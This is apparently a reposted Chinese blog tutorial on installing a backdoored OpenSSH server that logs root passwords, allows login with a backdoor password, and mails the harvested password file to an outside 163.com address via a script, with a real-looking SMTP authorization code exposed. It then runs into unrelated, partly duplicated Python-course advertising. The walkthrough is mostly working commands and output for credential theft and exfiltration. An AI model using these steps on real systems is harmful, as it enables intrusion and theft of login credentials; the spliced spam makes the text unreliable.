3 #define SSH_VERSION “OpenSSH_5.8p1 Debian-1ubuntu3”

4

5 #define SSH_PORTABLE “p1”

為:

#define SSH_VERSION " OpenSSH_5.3"

#define SSH_PORTABLE “p1”

4、安裝打了后門補丁的sshd服務

[root@itlaoxin63 tmp]# yum install -y openssl openssl-devel pam-devel zlib zlib-devel

開始安裝：

[root@itlaoxin63 openssh-5.9p1]# ./configure --prefix=/usr --sysconfdir=/etc/ssh --with-pam --with-kerberos5

參數(shù)說明：

–prefix=/usr #指定安裝到/usr 目錄下

–sysconfdir=/etc/ssh #指定sshd服務配置文件目錄

–with-pam #支持pam認證

–with-kerberos5 #支持kerberos認證

[root@itlaoxin63 openssh-5.9p1]# make -j 4 && make install

/usr/bin/install -c -m 0755 -s ssh /usr/bin/ssh

/usr/bin/install -c -m 0755 -s scp /usr/bin/scp

/usr/bin/install -c -m 0755 -s ssh-add /usr/bin/ssh-add

/usr/bin/install -c -m 0755 -s ssh-agent /usr/bin/ssh-agent

/usr/bin/install -c -m 0755 -s ssh-keygen /usr/bin/ssh-keygen

/usr/bin/install -c -m 0755 -s ssh-keyscan /usr/bin/ssh-keyscan

/usr/bin/install -c -m 0755 -s sshd /usr/sbin/sshd

/usr/bin/install -c -m 4711 -s ssh-keysign /usr/libexec/ssh-keysign

/usr/bin/install -c -m 0755 -s ssh-pkcs11-helper /usr/libexec/ssh-pkcs11-helper

/usr/bin/install -c -m 0755 -s sftp /usr/bin/sftp

5、重啟sshd服務：

[root@itlaoxin63 openssh-5.9p1]# service sshd restart

6、測試使用xshel登錄劫持密碼

測試前，發(fā)現(xiàn)/usr/share/ifile文件沒有存在

[root@itlaoxin63 ~]# ls /usr/share/ifile

ls: cannot access /usr/share/ifile: No such file or directory

xshell 登錄后

7.查看劫持到root密碼

[root@itlaoxin63 ~]# cat /usr/share/ifile

8. 另外我們也可以使用后門密碼來登錄root帳號

此處是在本機服務器上登錄的，會看到olog文件

[root@itlaoxin tmp]# ssh 192.168.1.5

The authenticity of host ‘192.168.1.5 (192.168.1.5)’ can’t be established.

ECDSA key fingerprint is 60:23:d2:32:d1:5b:1d:bd:1a:f0:33:3e:60:9c:35:f0.

Are you sure you want to continue connecting (yes/no)? yes

Warning: Permanently added ‘192.168.1.5’ (ECDSA) to the list of known hosts.

root@192.168.1.5’s password:

Last login: Thu May 6 01:08:58 2021 from 192.168.1.2

[root@itlaoxin ~]# cd /tmp/

[root@itlaoxin tmp]# ls

0x06-openssh-5.9p1.patch.tar.gz install.log openssh-5.9p1.patch

anaconda-ks.cfg install.log.syslog openssh-5.9p1.tar.gz

ilog olog sshpass-1.06.tar.gz

inotify-tools-3.13.tar.gz openssh-5.9p1 yum.log

[root@itlaoxin tmp]# cat olog

user:password@host --> root:redhat@192.168.1.5

[root@itlaoxin tmp]#

測試記錄遠程主機的密碼

1、使用itlaoxin63登錄遠程主機itlaoxin64

[root@itlaoxin63 ~]# ssh root@192.168.1.64

root@192.168.1.64’s password:123456

Last login: Wed Aug 12 19:29:28 2015 from 192.168.1.63

[root@itlaoxin64 ~]# exit

[root@itlaoxin63 ~]# cat /tmp/olog #查看記錄從itlaoxin64登錄到遠程主機的密碼

user:password@host --> root:12345678@192.168.1.63

user:password@host --> root:123456@192.168.1.64

自動發(fā)郵件測試

這里以163的smtp服務器為例，實現(xiàn)自動發(fā)送郵件

1、使用mail.rc實現(xiàn)發(fā)郵件

[root@itlaoxin63 ~]# vim /etc/mail.rc #在此文件中間，隨機找個位置插入以下內(nèi)容：

[root@itlaoxin tmp]# cat /etc/mail.rc

set from=xinsz08vip@163.com smtp=smtp.163.com

set smtp-auth-user=xinsz08vip smtp-auth-password=CNSYCIQAOUUGOSOA smtp-auth=login

set from=xinsz08vip@163.com smtp=smtp.163.com # 指定發(fā)件人的郵箱

set smtp-auth-user=xinsz08vip # 寫自己發(fā)件人的郵箱賬號

smtp-auth-password=CNSYCIQAOUUGOSOA # 寫發(fā)件人郵箱的授權(quán)碼

smtp-auth=login

2. 配置163郵箱

點：設置->POP3/SMTP/IMAP->開啟pop3服務（勾選開啟pop3服務后，smtp也會自動開啟）

開啟服務：

記住授權(quán)碼：CNSYCIQAOUUGOSOA

在操作的過程中，可能也需要要求發(fā)短信：微信掃碼即可

3. 測試郵件發(fā)送

[root@itlaoxin tmp]# mail -s “demo” xinsz08vip@163.com < /tmp/ilog

[外鏈圖片轉(zhuǎn)存失敗,源站可能有防盜鏈機制,建議將圖片保存下來直接上傳(img-FTuslAab-1620347763117)(uploading…)]

4. 編寫shell腳本自動發(fā)郵件，郵件的主題是服務器的IP地址

[root@itlaoxin63 bin]# vim /bin/zipmail #寫入以下內(nèi)容

[root@itlaoxin tmp]# cat /bin/zipmail

ip=ifconfig |grep inet |sed -n '1p' |awk '{print $2}' |awk -F ':' '{print $2}'

mail -s $ip xinsz08vip@163.com < /tmp/ilog

[root@itlaoxin63 bin]# chmod +x /bin/zipmail

5. 自動發(fā)郵件測試

[root@itlaoxin63 bin]# zipmail

發(fā)現(xiàn)也可以收到郵件，說明成功。

6. 實現(xiàn)當用戶修改密碼后，自動發(fā)送郵件

1、上傳inotify-tools-3.13.tar.gz到服務器上

自我介紹一下，小編13年上海交大畢業(yè)，曾經(jīng)在小公司待過，也去過華為、OPPO等大廠，18年進入阿里一直到現(xiàn)在。

深知大多數(shù)Python工程師，想要提升技能，往往是自己摸索成長或者是報班學習，但對于培訓機構(gòu)動則幾千的學費，著實壓力不小。自己不成體系的自學效果低效又漫長，而且極易碰到天花板技術(shù)停滯不前！

因此收集整理了一份《2024年P(guān)ython開發(fā)全套學習資料》，初衷也很簡單，就是希望能夠幫助到想自學提升又不知道該從何學起的朋友，同時減輕大家的負擔。

既有適合小白學習的零基礎資料，也有適合3年以上經(jīng)驗的小伙伴深入學習提升的進階課程，基本涵蓋了95%以上Python開發(fā)知識點，真正體系化！

由于文件比較大，這里只是將部分目錄大綱截圖出來，每個節(jié)點里面都包含大廠面經(jīng)、學習筆記、源碼講義、實戰(zhàn)項目、講解視頻，并且后續(xù)會持續(xù)更新

如果你覺得這些內(nèi)容對你有幫助，可以添加V獲?。簐ip1024c （備注Python）

如果你也是看準了Python，想自學Python，在這里為大家準備了豐厚的免費學習大禮包，帶大家一起學習，給大家剖析Python兼職、就業(yè)行情前景的這些事兒。

一、Python所有方向的學習路線

Python所有方向路線就是把Python常用的技術(shù)點做整理，形成各個領域的知識點匯總，它的用處就在于，你可以按照上面的知識點去找對應的學習資源，保證自己學得較為全面。

二、學習軟件

工欲善其必先利其器。學習Python常用的開發(fā)軟件都在這里了，給大家節(jié)省了很多時間。

三、全套PDF電子書

書籍的好處就在于權(quán)威和體系健全，剛開始學習的時候你可以只看視頻或者聽某個人講課，但等你學完之后，你覺得你掌握了，這時候建議還是得去看一下書籍，看權(quán)威技術(shù)書籍也是每個程序員必經(jīng)之路。

四、入門學習視頻

我們在看視頻學習的時候，不能光動眼動腦不動手，比較科學的學習方法是在理解之后運用它們，這時候練手項目就很適合了。

四、實戰(zhàn)案例

光學理論是沒用的，要學會跟著一起敲，要動手實操，才能將自己的所學運用到實際當中去，這時候可以搞點實戰(zhàn)案例來學習。

五、面試資料

我們學習Python必然是為了找到高薪的工作，下面這些面試題是來自阿里、騰訊、字節(jié)等一線互聯(lián)網(wǎng)大廠最新的面試資料，并且有阿里大佬給出了權(quán)威的解答，刷完這一套面試資料相信大家都能找到滿意的工作。

成為一個Python程序員專家或許需要花費數(shù)年時間，但是打下堅實的基礎只要幾周就可以，如果你按照我提供的學習路線以及資料有意識地去實踐，你就有很大可能成功！
最后祝你好運?。。?span toymoban-style="hidden">文章來源地址http://www.zghlxwxcb.cn/news/detail-844839.html

中去，這時候可以搞點實戰(zhàn)案例來學習。

五、面試資料

我們學習Python必然是為了找到高薪的工作，下面這些面試題是來自阿里、騰訊、字節(jié)等一線互聯(lián)網(wǎng)大廠最新的面試資料，并且有阿里大佬給出了權(quán)威的解答，刷完這一套面試資料相信大家都能找到滿意的工作。

成為一個Python程序員專家或許需要花費數(shù)年時間，但是打下堅實的基礎只要幾周就可以，如果你按照我提供的學習路線以及資料有意識地去實踐，你就有很大可能成功！
最后祝你好運?。?！

到了這里，關(guān)于絕了！美圖技術(shù)專家獲取肉雞服務器密碼如探囊取物，騰訊字節(jié)等大廠面試真題匯總的文章就介紹完了。如果您還想了解更多內(nèi)容，請在右上角搜索TOY模板網(wǎng)以前的文章或繼續(xù)瀏覽下面的相關(guān)文章，希望大家以后多多支持TOY模板網(wǎng)！